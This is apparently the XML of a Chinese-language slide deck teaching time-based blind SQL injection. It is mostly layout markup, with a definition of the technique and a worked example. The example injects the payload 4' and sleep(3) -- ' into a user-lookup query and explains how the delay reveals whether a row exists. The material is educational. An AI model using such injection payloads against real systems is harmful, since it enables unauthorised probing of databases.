              <a:sp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zh-CN" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1D4999"/>
                  </a:solidFill>
                  <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                </a:rPr>
                <a:t>02 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1D4999"/>
                  </a:solidFill>
                  <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                </a:rPr>
                <a:t>时间盲注定义</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1D4999"/>
                  </a:solidFill>
                  <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                </a:rPr>
                <a:t>&amp;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1D4999"/>
                  </a:solidFill>
                  <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                </a:rPr>
                <a:t>原理</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="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76E8A090-41A8-5F4D-94BE-7E081B07E5DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1238250" y="3349464"/>
              <a:ext cx="768350" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="76200">
              <a:solidFill>
                <a:srgbClr val="1D4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626A29F-90EF-2F45-AC22-0DBA4EC90C74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-255181" y="3636286"/>
            <a:ext cx="1271653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5667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CED99-4025-2743-9E47-0910E9C34221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363415" y="306601"/>
            <a:ext cx="4796414" cy="55772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定义</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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6068DB0-0E34-0648-8A70-B6AAAE455749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-355600" y="1122363"/>
            <a:ext cx="12547600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cmpd="sng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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6B252FF-74BF-E647-8A3E-5E6F88C8AD9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="798597" y="1540463"/>
            <a:ext cx="7797362" cy="3880999"/>
            <a:chOff x="2283725" y="1775964"/>
            <a:chExt cx="7797362" cy="3880999"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="矩形 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3104446" y="1775964"/>
              <a:ext cx="6976641" cy="3880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800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1D4999"/>
                  </a:solidFill>
                  <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                </a:rPr>
                <a:t>时间盲注是什么？</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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	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2000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通过注入特定语句，根据对页面请求的物理反馈，来判断是否注入成功，如： 在</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000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SQL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000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语句中使用</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000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sleep()</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000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 函数看加载网页的时间来判断注入点。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US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2000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适用场景：通常是无法从显示页面上获取执行结果，甚至连注入语句是否执行都无从得知。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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C23BC1-A326-064A-92FE-C8B0FD431769}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm rot="5283976" flipH="1">
              <a:off x="2284519" y="2946095"/>
              <a:ext cx="379412" cy="381000"/>
              <a:chOff x="3552" y="960"/>
              <a:chExt cx="215" cy="182"/>
            </a:xfrm>
          </p:grpSpPr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CFA5EEC6-B242-C14A-B35F-5A14F89779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48" y="960"/>
                <a:ext cx="119" cy="182"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 212 w 262"/>
                  <a:gd name="T1" fmla="*/ 374 h 375"/>
                  <a:gd name="T2" fmla="*/ 261 w 262"/>
                  <a:gd name="T3" fmla="*/ 316 h 375"/>
                  <a:gd name="T4" fmla="*/ 0 w 262"/>
                  <a:gd name="T5" fmla="*/ 0 h 375"/>
                  <a:gd name="T6" fmla="*/ 212 w 262"/>
                  <a:gd name="T7" fmla="*/ 374 h 37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62"/>
                  <a:gd name="T13" fmla="*/ 0 h 375"/>
                  <a:gd name="T14" fmla="*/ 262 w 262"/>
                  <a:gd name="T15" fmla="*/ 375 h 37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62" h="375">
                    <a:moveTo>
                      <a:pt x="212" y="374"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="261" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="374"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="764700"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="FF9900"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="2700000" scaled="1"/>
              </a:gradFill>
              <a:ln w="12700" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="F2BF5A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latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:endParaRPr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20FEA43C-0851-7845-A28F-CDA60BF167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52" y="960"/>
                <a:ext cx="194" cy="182"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 426"/>
                  <a:gd name="T1" fmla="*/ 374 h 375"/>
                  <a:gd name="T2" fmla="*/ 425 w 426"/>
                  <a:gd name="T3" fmla="*/ 374 h 375"/>
                  <a:gd name="T4" fmla="*/ 213 w 426"/>
                  <a:gd name="T5" fmla="*/ 0 h 375"/>
                  <a:gd name="T6" fmla="*/ 0 w 426"/>
                  <a:gd name="T7" fmla="*/ 374 h 37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6"/>
                  <a:gd name="T13" fmla="*/ 0 h 375"/>
                  <a:gd name="T14" fmla="*/ 426 w 426"/>
                  <a:gd name="T15" fmla="*/ 375 h 37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6" h="375">
                    <a:moveTo>
                      <a:pt x="0" y="374"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="425" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="374"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="764700"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="FF9900"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="2700000" scaled="1"/>
              </a:gradFill>
              <a:ln w="12700" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="F2BF5A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latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 131">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CA0F82F-0B9B-4B4A-80CB-786014B85083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="798597" y="1734429"/>
            <a:ext cx="433767" cy="433767"/>
            <a:chOff x="1902319" y="1507871"/>
            <a:chExt cx="938512" cy="938512"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 132">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45C4FD5B-6F49-6640-AD24-2BF9D73369F9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2136408" y="1764045"/>
              <a:ext cx="470334" cy="426157"/>
              <a:chOff x="6448425" y="796925"/>
              <a:chExt cx="287338" cy="260350"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Freeform 3562">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{959ECAE1-163E-6C49-98FC-8ED436C8C7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8425" y="796925"/>
                <a:ext cx="277812" cy="161925"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 701"/>
                  <a:gd name="T1" fmla="*/ 285 h 408"/>
                  <a:gd name="T2" fmla="*/ 5 w 701"/>
                  <a:gd name="T3" fmla="*/ 288 h 408"/>
                  <a:gd name="T4" fmla="*/ 2 w 701"/>
                  <a:gd name="T5" fmla="*/ 290 h 408"/>
                  <a:gd name="T6" fmla="*/ 1 w 701"/>
                  <a:gd name="T7" fmla="*/ 293 h 408"/>
                  <a:gd name="T8" fmla="*/ 0 w 701"/>
                  <a:gd name="T9" fmla="*/ 297 h 408"/>
                  <a:gd name="T10" fmla="*/ 1 w 701"/>
                  <a:gd name="T11" fmla="*/ 300 h 408"/>
                  <a:gd name="T12" fmla="*/ 2 w 701"/>
                  <a:gd name="T13" fmla="*/ 303 h 408"/>
                  <a:gd name="T14" fmla="*/ 5 w 701"/>
                  <a:gd name="T15" fmla="*/ 306 h 408"/>
                  <a:gd name="T16" fmla="*/ 8 w 701"/>
                  <a:gd name="T17" fmla="*/ 308 h 408"/>
                  <a:gd name="T18" fmla="*/ 259 w 701"/>
                  <a:gd name="T19" fmla="*/ 408 h 408"/>
                  <a:gd name="T20" fmla="*/ 701 w 701"/>
                  <a:gd name="T21" fmla="*/ 0 h 408"/>
                  <a:gd name="T22" fmla="*/ 8 w 701"/>
                  <a:gd name="T23" fmla="*/ 285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01" h="408">
                    <a:moveTo>
                      <a:pt x="8" y="285"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="285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accent5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8" name="Freeform 3563">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3404AFBF-A291-384A-9CFD-050600125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788" y="800100"/>
                <a:ext cx="180975" cy="257175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 456"/>
                  <a:gd name="T1" fmla="*/ 424 h 646"/>
                  <a:gd name="T2" fmla="*/ 0 w 456"/>
                  <a:gd name="T3" fmla="*/ 635 h 646"/>
                  <a:gd name="T4" fmla="*/ 0 w 456"/>
                  <a:gd name="T5" fmla="*/ 639 h 646"/>
                  <a:gd name="T6" fmla="*/ 3 w 456"/>
                  <a:gd name="T7" fmla="*/ 642 h 646"/>
                  <a:gd name="T8" fmla="*/ 5 w 456"/>
                  <a:gd name="T9" fmla="*/ 645 h 646"/>
                  <a:gd name="T10" fmla="*/ 9 w 456"/>
                  <a:gd name="T11" fmla="*/ 646 h 646"/>
                  <a:gd name="T12" fmla="*/ 11 w 456"/>
                  <a:gd name="T13" fmla="*/ 646 h 646"/>
                  <a:gd name="T14" fmla="*/ 12 w 456"/>
                  <a:gd name="T15" fmla="*/ 646 h 646"/>
                  <a:gd name="T16" fmla="*/ 16 w 456"/>
                  <a:gd name="T17" fmla="*/ 646 h 646"/>
                  <a:gd name="T18" fmla="*/ 18 w 456"/>
                  <a:gd name="T19" fmla="*/ 645 h 646"/>
                  <a:gd name="T20" fmla="*/ 21 w 456"/>
                  <a:gd name="T21" fmla="*/ 644 h 646"/>
                  <a:gd name="T22" fmla="*/ 22 w 456"/>
                  <a:gd name="T23" fmla="*/ 641 h 646"/>
                  <a:gd name="T24" fmla="*/ 126 w 456"/>
                  <a:gd name="T25" fmla="*/ 469 h 646"/>
                  <a:gd name="T26" fmla="*/ 315 w 456"/>
                  <a:gd name="T27" fmla="*/ 569 h 646"/>
                  <a:gd name="T28" fmla="*/ 317 w 456"/>
                  <a:gd name="T29" fmla="*/ 570 h 646"/>
                  <a:gd name="T30" fmla="*/ 320 w 456"/>
                  <a:gd name="T31" fmla="*/ 572 h 646"/>
                  <a:gd name="T32" fmla="*/ 323 w 456"/>
                  <a:gd name="T33" fmla="*/ 570 h 646"/>
                  <a:gd name="T34" fmla="*/ 325 w 456"/>
                  <a:gd name="T35" fmla="*/ 570 h 646"/>
                  <a:gd name="T36" fmla="*/ 329 w 456"/>
                  <a:gd name="T37" fmla="*/ 567 h 646"/>
                  <a:gd name="T38" fmla="*/ 332 w 456"/>
                  <a:gd name="T39" fmla="*/ 561 h 646"/>
                  <a:gd name="T40" fmla="*/ 456 w 456"/>
                  <a:gd name="T41" fmla="*/ 0 h 646"/>
                  <a:gd name="T42" fmla="*/ 0 w 456"/>
                  <a:gd name="T43" fmla="*/ 424 h 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56" h="646">
                    <a:moveTo>
                      <a:pt x="0" y="424"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="639"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="642"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="424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accent5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sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Oval 133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C49A039-FA19-1649-A5F4-A87AAE6C47D2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1902319" y="1507871"/>
              <a:ext cx="938512" cy="938512"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1D49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25564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CED99-4025-2743-9E47-0910E9C34221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363415" y="306601"/>
            <a:ext cx="4796414" cy="55772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定义</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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6068DB0-0E34-0648-8A70-B6AAAE455749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-355600" y="1122363"/>
            <a:ext cx="12547600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cmpd="sng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1641762" y="1574367"/>
            <a:ext cx="9718965" cy="4439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原理示意</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill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  <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999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1D4999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select * from user where id= ‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D4999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？</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D4999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’  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FF0000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？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 用户输入，替代为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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4’ and sleep(3)  -- ‘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实际上执行的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SQL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语句：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1D4999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select * from user where id= ‘4’ and sleep(3) -- ‘’</a:t>
            </a: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rgbClr val="1D4999"/>
              </a:solidFill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2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当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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id=4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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存在时，休眠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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秒</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill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2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当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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id=4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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不存在时，直接返回</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill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accent2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整条拼接出来的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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是正确的就执行最后的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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，前面错误（不存在），</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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sleep(3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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不执行。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="AutoShape 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="323280" y="3562908"/>
            <a:ext cx="1283451" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 65000"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="00576F"/>
              </a:gs>
              <a:gs pos="50000">
                <a:srgbClr val="00BDF0"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="00576F"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="2700000" scaled="1"/>
          </a:gra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176200" prstMaterial="legacyMatte">
            <a:bevelT w="13500" h="13500" prst="angle"/>
            <a:bevelB w="13500" h="13500" prst="angle"/>
            <a:extrusionClr>
              <a:srgbClr val="00BDF0"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="73025" tIns="36512" rIns="73025" bIns="36512" anchor="ctr">
            <a:flatTx/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 131">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61EB4108-BD37-3345-B29A-283F65D26D02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="798597" y="1734429"/>
            <a:ext cx="433767" cy="433767"/>
            <a:chOff x="1902319" y="1507871"/>
            <a:chExt cx="938512" cy="938512"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12" name="Group 132">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AADF26F9-955B-B444-B03E-8AF9CB266CA2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2136408" y="1764045"/>
              <a:ext cx="470334" cy="426157"/>
              <a:chOff x="6448425" y="796925"/>
              <a:chExt cx="287338" cy="260350"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="Freeform 3562">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0C319DB-2637-4042-9F66-5CF580705F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8425" y="796925"/>
                <a:ext cx="277812" cy="161925"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 701"/>
                  <a:gd name="T1" fmla="*/ 285 h 408"/>
                  <a:gd name="T2" fmla="*/ 5 w 701"/>
                  <a:gd name="T3" fmla="*/ 288 h 408"/>
                  <a:gd name="T4" fmla="*/ 2 w 701"/>
                  <a:gd name="T5" fmla="*/ 290 h 408"/>
                  <a:gd name="T6" fmla="*/ 1 w 701"/>
                  <a:gd name="T7" fmla="*/ 293 h 408"/>
                  <a:gd name="T8" fmla="*/ 0 w 701"/>
                  <a:gd name="T9" fmla="*/ 297 h 408"/>
                  <a:gd name="T10" fmla="*/ 1 w 701"/>
                  <a:gd name="T11" fmla="*/ 300 h 408"/>
                  <a:gd name="T12" fmla="*/ 2 w 701"/>
                  <a:gd name="T13" fmla="*/ 303 h 408"/>
                  <a:gd name="T14" fmla="*/ 5 w 701"/>
                  <a:gd name="T15" fmla="*/ 306 h 408"/>
                  <a:gd name="T16" fmla="*/ 8 w 701"/>
                  <a:gd name="T17" fmla="*/ 308 h 408"/>
                  <a:gd name="T18" fmla="*/ 259 w 701"/>
